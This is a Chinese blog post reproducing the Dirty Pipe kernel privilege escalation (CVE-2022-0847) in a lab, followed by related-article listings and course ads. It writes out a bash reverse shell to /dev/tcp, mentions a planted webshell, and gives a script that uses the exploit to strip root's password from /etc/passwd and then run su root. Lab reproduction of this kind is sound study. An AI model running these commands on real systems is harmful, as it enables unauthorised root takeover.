Linux内核提权漏洞(Dirty-pipe)复现_linux提权漏洞

已于 2024-01-19 21:13:15 修改
阅读量229 收藏
点赞数
文章标签: linux 网络 运维
于 2023-09-02 13:30:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZL_1618/article/details/132634561
版权

前言:CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。

影响版本:

5.8 <= Linux内核版本 <5.16.11 / 5.15.25 / 5.10.102

0x01 环境部署

  1. 系统版本: Ubuntu 21.10
  2. 系统内核: Linux m1key 5.13.0-16-generic #16-Ubuntu SMP Fri Sep 3 14:53:27 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
  3. 靶机IP:192.168.2.115
  4. 提前安装好apache等组件,在网站根目录上写一个一句话木马。

0x02 连接webshell反弹shell

1、查看靶机上的webshell内容。

2、使用蚁剑连接webshell,打开tmp目录,将准备好的提权exp和反弹shell脚本上传到/tmp目录下。

其中re.sh的内容为:bash -i >& /dev/tcp/192.168.2.1/12345 0>&1.
exp为可执行的提权程序。由于利用方式有点繁琐,所以单独写一个2.sh调用exp来进行一个提权的操作。

3、打开蚁剑虚拟终端,给刚上传上去的三个文件加个权限。
chmod 777 /tmp/*

4、攻击机监听本地端口12345,蚁剑虚拟终端执行bash re.sh

0x03 提权

1、反弹shell之后,就可以执行提权程序了。

2、可以看到我们已经成功获取了root权限。

3、我们可以看看2.sh里面的内容分析一下。

# 备份密码文件
rm -f /tmp/passwd
cp /etc/passwd /tmp/passwd
if [ -f "/tmp/passwd" ];then
 echo "/etc/passwd已备份到/tmp/passwd"
 passwd_tmp=$(cat /etc/passwd|head)
 ./exp /etc/passwd 1 "${passwd_tmp/root:x/oot:}"

 echo -e "\n# 恢复原来的密码\nrm -rf /etc/passwd\nmv /tmp/passwd /etc/passwd"

 # 现在可以无需密码切换到root账号
 su root
else
 echo "/etc/passwd未备份到/tmp/passwd"
 exit 1
fi

先将/etc/passwd文件复制到当前目录,然后利用EXP修改系统的passwd文件使其不用密码就能登录,然后直接su到root,然后再将之前的passwd替换回去,所谓神不知鬼不觉,非常好用。

0x04 获取源码

  1. 由于该exp比较敏感,所以无法公布,想要的小伙伴可以联系我企鹅群获取。
  2. 相关视频链接:https://www.bilibili.com/video/BV1SZ4y1r74E/?spm_id_from=333.999.0.0&vd_source=913edb0b204c3345e9e76e1981bc8198

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

程序员--青青
关注
Linux DirtyPipe内核提权漏洞(CVE-2022-0847)复现与分析
SHELLCODE_8BIT的博客
10-27 2149
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe
漏洞复现Linux DirtyPipe 内核提权漏洞 (CVE-2022-0847)
做自己喜欢的事,并将其发挥到极致!
03-08 2531
文章目录声明一、漏洞描述二、影响版本三、漏洞复现四、修复建议五、参考链接 声明 本文章仅限于漏洞复现以及技术研究,切勿用于非法用途,切记! 一、漏洞描述 它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可
Dirty-Pipe Linux内核提权漏洞复现(CVE-2022-0847)
IerkeU的博客
03-09 5319
漏洞描述 CVE-2022-0847-DirtyPipe-Exploit 存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件(甚至是只读文件)中的数据,从而可将普通权限的用户提升到root权限。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞Dirty Cow),但它更容易被利用,漏洞作者将此漏洞命名为Dirty Pipe。 影响版本 影响范围:5.8 <= Linux 内核版本 < 5.16.11 /
linux安全漏洞,普通用户提权root执行任意命令!
whoim_i的博客
03-17 3598
目录前言漏洞详情漏洞利用修复建议         ~~~~~~~~        因为想要面对一个新的开始,一个人必须有梦想、有希望、有对未来的憧憬。如果没有这些,就不叫新的开始,而叫逃亡。 ​​​​    ...
推荐开源项目:脏管道(Dirty Pipe)利用工具改进版
最新发布
gitblog_00339的博客
08-15 535
推荐开源项目:脏管道(Dirty Pipe)利用工具改进版 CVE-2022-0847-DirtyPipe-ExploitA root exploit for CVE-2022-0847 (Dirty Pipe)项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2022-0847-DirtyPipe-Exploit 项目介绍 在安全研究的广阔天地中,有这样一...
权限提升:利用Linux漏洞提权
qq_68163788的博客
02-13 2679
Linux漏洞提权是指利用Linux系统中存在的漏洞,通过特定的方法来获取更高的权限。这种方法通常被黑客用来获取系统管理员权限,从而可以对系统进行更深入的攻击和控制。 一种常见的Linux漏洞提权方法是利用内核漏洞内核是操作系统的核心部分,负责管理系统的资源和提供各种功能。如果内核中存在漏洞,黑客可以利用这些漏洞来提升权限。例如,通过利用内核中的缓冲区溢出漏洞,黑客可以在系统中执行恶意代码,并获取更高的权限。
Linux DirtyPipe权限提升漏洞(CVE-2022-0847)
谢公子的博客
09-19 3665
3月7日,国外的安全研究员马克斯·凯勒曼发布博客,披露了一处存在于Linux 内核中的本地提权漏洞CVE-2022-0847。CVE-2022-0847是存在于Linux内核5.8及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权root。CVE-2022-0847 的漏洞原理类似于CVE-2016-5195脏牛漏洞Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
CVE-2022-0847(脏管道、提权内核漏洞)
墨痕诉清风的博客
06-22 4279
摘要 CVE-2022-0847它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。它类似于 Dirty COW (CVE-2016-5195),但更容易被利用。内核影响版本:5.8 ...............
Dirty Pipe脏管道提权漏洞复现(CVE-2022-0847)
小千安全
05-06 909
攻击者通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root这个漏洞作者将其命名为了 Dirty Pipe(脏管道),一看到这名字讲道理就让人想到了 Dirty Cow(脏牛),这是因为该漏洞的原理比较类似于 Dirty Cow,但这个漏洞更容易被利用。
DirtyPipe 利用(CVE-2022-0847)
内核工匠
10-21 4295
事件背景3月初,国外安全研究人员披露了一个新的Android/Linux内核的高危漏洞漏洞编号为CVE-2022-0847。由于类似大名鼎鼎的DirtyCOW(脏牛漏洞,又被命名为DirtyPipe(脏管道)。漏洞从上游linux内核5.8版本的一个补丁引入,影响所有使用linux内核的操作系统,在最新的手机系统Android12+kernel5.10上也有巨大安全危害。经过我们内部研究发现,...
推荐篇:DirtyPipeRoot —— 开启你的安卓设备临时超级权限之旅
gitblog_00020的博客
06-03 1479
推荐篇:DirtyPipeRoot —— 开启你的安卓设备临时超级权限之旅 去发现同类优质开源项目:https://gitcode.com/ 在安卓开发与黑客文化交织的领域,总有那么几项技术能让人眼前一亮,今天我们要探讨的正是这样一个强大而大胆的开源项目——DirtyPipeRoot。 项目介绍 DirtyPipeRoot,基于知名的安全研究漏洞 Dirty Pipe(由polygraphene...
Linux通过反弹Shell提权实验
qq_59201520的博客
02-20 1822
通过反弹shell在Linux提权的实验
Linux提权————Linux下三种不同方式的提权技巧
Fly_鹏程万里
05-16 4098
在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞提权VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到获取到低权限SHELL后我们通常做下面几件事1.检测操作系统的发...
DirtyPipe(脏管道)提权
weixin_45794666的博客
03-08 6895
DirtyPipe提权 CVE-2022-0847 漏洞详情 新管道缓冲区结构的“flags”成员在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化的方式存在缺陷,因此可能包含陈旧的值。非特权本地用户可通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Di
Dirty Pipe 漏洞(CVE-2022-0847)复现
safehao的博客
03-10 2285
Dirty Pipe 漏洞(CVE-2022-0847)复现 2022年3月7日Max Kellermann max.kellermann@ionos.com发布关于[The Dirty Pipe Vulnerablity](The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation (cm4all.com))的文章。描述了关于该漏洞的发现过程以及POC。Dirty Pipe漏洞类似于Dirty Cow漏洞,该漏洞允许改
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值